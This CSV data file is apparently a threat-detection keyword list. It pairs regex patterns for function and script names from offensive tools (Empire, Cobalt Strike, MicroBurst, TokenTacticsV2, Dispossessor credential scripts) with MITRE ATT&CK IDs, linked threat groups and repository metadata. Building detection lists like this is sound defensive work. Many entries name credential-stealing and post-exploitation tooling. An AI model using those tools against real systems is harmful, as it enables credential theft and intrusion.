"*Get-AZStorageKeysREST.ps1*",".{0,1000}Get\-AZStorageKeysREST\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","45892"
"*Get-AzureADDomainInfo*",".{0,1000}Get\-AzureADDomainInfo.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","45893"
"*Get-AzureADDomainInfo.ps1*",".{0,1000}Get\-AzureADDomainInfo\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","45894"
"*Get-AzureADUsers *",".{0,1000}Get\-AzureADUsers\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Gets user directory","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","45895"
"*Get-AzurePasswords*",".{0,1000}Get\-AzurePasswords.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","45896"
"*Get-AzureTokenFromESTSCookie *",".{0,1000}Get\-AzureTokenFromESTSCookie\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","45897"
"*Get-AzureTokenFromESTSCookie -ESTSAuthCookie *",".{0,1000}Get\-AzureTokenFromESTSCookie\s\-ESTSAuthCookie\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","45898"
"*Get-AzUserAssignedIdentity*",".{0,1000}Get\-AzUserAssignedIdentity.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","45899"
"*Get-BaseLineResponseTimeEAS*",".{0,1000}Get\-BaseLineResponseTimeEAS.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","45900"
"*Get-BeaconAPI*",".{0,1000}Get\-BeaconAPI.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","N/A","10","10","250","35","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z","45901"
"*GetBearerToken.exe https://*.sharepoint.com*",".{0,1000}GetBearerToken\.exe\shttps\:\/\/.{0,1000}\.sharepoint\.com.{0,1000}","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","0","N/A","N/A","7","3","254","25","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z","45902"
"*Get-BloodHoundData*",".{0,1000}Get\-BloodHoundData.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-SPN.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45903"
"*Get-BootKey*",".{0,1000}Get\-BootKey.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45904"
"*Get-BrowserData.ps1*",".{0,1000}Get\-BrowserData\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1153","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45905"
"*Get-BrowserInformation*",".{0,1000}Get\-BrowserInformation.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45906"
"*GetC2Server*",".{0,1000}GetC2Server.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","45907"
"*Get-CachedGPPPassword*",".{0,1000}Get\-CachedGPPPassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45908"
"*Get-CachedRDPConnection*",".{0,1000}Get\-CachedRDPConnection.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","45909"
"*Get-CachedRDPConnection*",".{0,1000}Get\-CachedRDPConnection.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45910"
"*getcap not found in PATH, cannot escalate using capabilities*",".{0,1000}getcap\snot\sfound\sin\sPATH,\scannot\sescalate\susing\scapabilities.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","45911"
"*Get-ChromeBookmarks*",".{0,1000}Get\-ChromeBookmarks.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45916"
"*Get-ChromeDump *",".{0,1000}Get\-ChromeDump\s.{0,1000}","offensive_tool_keyword","Dispossessor","credential scripts used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","45917"
"*Get-ChromeDump*",".{0,1000}Get\-ChromeDump.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1150","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45918"
"*Get-ChromeDump*",".{0,1000}Get\-ChromeDump.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","45919"
"*Get-ChromeDump.ps1*",".{0,1000}Get\-ChromeDump\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","45920"
"*Get-ChromeHistory*",".{0,1000}Get\-ChromeHistory.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45921"
"*Get-ChromePasswords.ps1*",".{0,1000}Get\-ChromePasswords\.ps1.{0,1000}","offensive_tool_keyword","Dispossessor","credential scripts used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","45922"
